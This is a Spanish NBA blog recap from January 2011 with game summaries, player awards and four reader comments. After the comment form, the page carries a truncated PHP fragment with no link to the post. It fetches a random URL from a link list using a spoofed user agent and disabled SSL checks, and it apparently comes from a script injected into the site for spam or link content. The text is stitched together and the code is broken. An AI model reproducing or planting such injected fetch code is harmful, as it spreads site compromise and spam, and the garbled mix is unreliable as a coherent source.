La Crónica (28/01/2011)

29 de January de 2011 por Viva_Dirk

Noche de sorpresas la de ayer, con 12 partidos se puede esperar un poco de todo y así fue.

Los Lakers perdieron en casa frente a Sacramento, un gran partido de DeMarcus Cousins y un mayor acierto en el tiro de los visitantes fueron suficiente para ganar a unos Lakers donde Gasol estuvo mal de cara al aro y solo Brown acompañó a Kobe. También cayeron los Celtics en Phoenix, a raíz de un primer cuarto con +14 para los locales, Doc Rivers decidió no quemar naves en busca de la victoria, puesto que ninguno de sus jugadores llegó a disputar 32 minutos, y en los Suns vimos el mejor partido de la carrera de Gortat. En el gran duelo de la noche los Bulls tumbaron a Orlando a pesar del descomunal partido de Dwight Howard, que vio como Jameer Nelson se retiraba lesionado en el primer cuarto, la parejita de los Bulls vio como anoche se sumaba a ellos Luol Deng, debe ser habitual si quieren ser verdaderos aspirantes a todo.

Tres partidos se decidieron en el tiempo extra. Los Bucks ganaron en Toronto con un gran acierto de su juego interior y el despertar de Corey Maggette. Los Bobcats siguen a buen ritmo, ayer victoria contra Golden State, gracias a la pareja Augustin&Jackson. Hasta las 2 prórrogas se fue el Wizars-Thunders, para la victoria final de Oklahoma, se confirma que Westbrook esta rindiendo a un nivel tan alto como el de Durant, y que Nick Young es un tremendo chupón, ayer en 52 minutos que jugó dio una mísera asistencia, eso si, se cascó 33 tiros.

Los Heat sudaron sangre para ganar a Detroit, sin Wade ni Bosh no tuvo mas remedio Lebron que poner el ‘modo Cleveland’ en on para llevarse el partido. Los Hawks dejaron claro que están por encima de los Knicks por algo, partidazo se su particular ‘Big Three’. Los Pacers apalizaron a los Nets con Mike Dunleavy derrochando clase, una lástima las lesiones que han machacado a este exquisito jugador, y no podemos olvidarnos de mencionar la ‘dureza’ de Brook López bajo los aros, anoche un rebote en 30 minutos.

Los Grizzlies ganaron en Phily, un gran rendimiento del quinteto con Zach Randolph como punta de lanza fue bastante frente a unos apagados Sixers. Denver gano en Cleveland con una gran versión de Carmelo y un cada vez menos sorprendente Afflalo, en frente partidazo para nada del juego interior Hickson-Jamison. Para terminar los Jazzs retomaron la senda de la victoria contra los Wolves, lo hicieron sin Deron que tiene problemas en su muñeca derecha, así que los Millsap, Kirilenko y Jefferson se pusieron el mono de trabajo dejar la victoria en casa, Love&Beasley hicieron lo suyo.

PREMIOS

MVP: De los muchos candidatos que hay, nos quedamos con 3. El bronce para DeMarcus Cousins por ser el principal motivo de la victoria de los Kings en el Staples con sus 27 puntos, 10 rebotes, 3 robos y 2 tapones. Plata para Lebron James que con 39 puntos, 8 rebotes, 9 asistencias y 2 tapones fue el todo para Miami ante la ausencia de Wade y Bosh. Y oro para el tremendo triple doble de Russell Westbrook, 35 puntos, 13 rebotes y 13 asistencias para sellar la victoria de los Thunders en casa.

Rookie: El premio es para Cousins, pero hay que nombrar a unos cuantos mas. John Wall jugó casi 52 minutos, no están mal sus 13 puntos, 5 rebotes y 10 asistencias, con pésimos porcentajes pero también con el sorprendente dato de 0 pérdidas; su compañero Trevor Booker se destapó con 21 puntos y 12 rebotes. Buen partido de Wes Johnson con 19 puntos en 27 minutos. Paul George se fue a 15-3-3. Landry Fields cumplió como casi siempre, 15 puntos y 5 rebotes.

Sorpresa: Marcin Gortat fue una pesadilla para los Celtics, 19 puntos y 17 rebotes le hacen merecedor de nuestro premio. Mike Dunleavy se exhibió ayer con 30 puntos, 4 rebotes, 5 asistencias, 6 de 7 en triples y 12 de 16 en tiros de campo, ¡¡JUGÓN!!.

Decepción: Lamentable partido de Boston al completo, solo Garnett salvó mínimamente los muebles, el resto del ‘Big Four’ sumaron 12 pérdidas y un 31% de acierto. Lamar Odom no fue anoche ninguna solución desde el banco, a pesar de rellenar bien la hoja de estadísticas, no se puede anotar 4 puntos con un 0 de 7 en tiros de campo en casi 30 minutos de juego.

Esfuerzo en vano: Como en el MVP nos vamos a quedar con 3 jugadores. El bronce para el habitual del premio, Kevin Love sumó 22 puntos y 15 rebotes a sus estadísticas globales. Kobe Bryant remó solo anoche, 38 puntos, 4 rebotes, 7 asistencias y 3 robos le dan la plata. El oro indiscutible para Dwight ‘Superman’ Howard, 40 puntos, 15 rebotes, 4 robos, 3 tapones, 70% en tiros de campo y 75% en tiros libres no fueron suficiente para ganar a los Bulls.

Imágenes | Yahoo Sports

Comenta

4 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Bueno bueno, cuando me he levantado esta mañana y he visto el resultado. Grandes los paletos. El señor Cousins tiene 20 años… pero es un jodido mulo físicamente. Si aprende a no hacer pasos de salida y mejora su tiro a cuatro metros… podemos hablar de un jugador con gran futuro

      Citar

  2. luigi_sal dice:
    #2

    q pena lo de los magic ayer, de verdad. howard jugó él solo el pobre. no entiendo cómo jugadores como arenas, turkoglu y demás, cuando no les entran los tiros no intentan penetrar para sacar tiros libres. eso lo hacía mejor carter. se notó la falta de nelson, sin duda. lástima!

      Citar

  3. Txusma dice:
    #3

    Garnett tiene algún amigo en la NBA?

      Citar

  4. max dice:
    #4

    Si hubiera un premio al jugador más sucio tendria que llamarse trofeo Kevin Garnett. El manotazo en las pelotas de Frye mientras éste lanzaba tiene tela….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>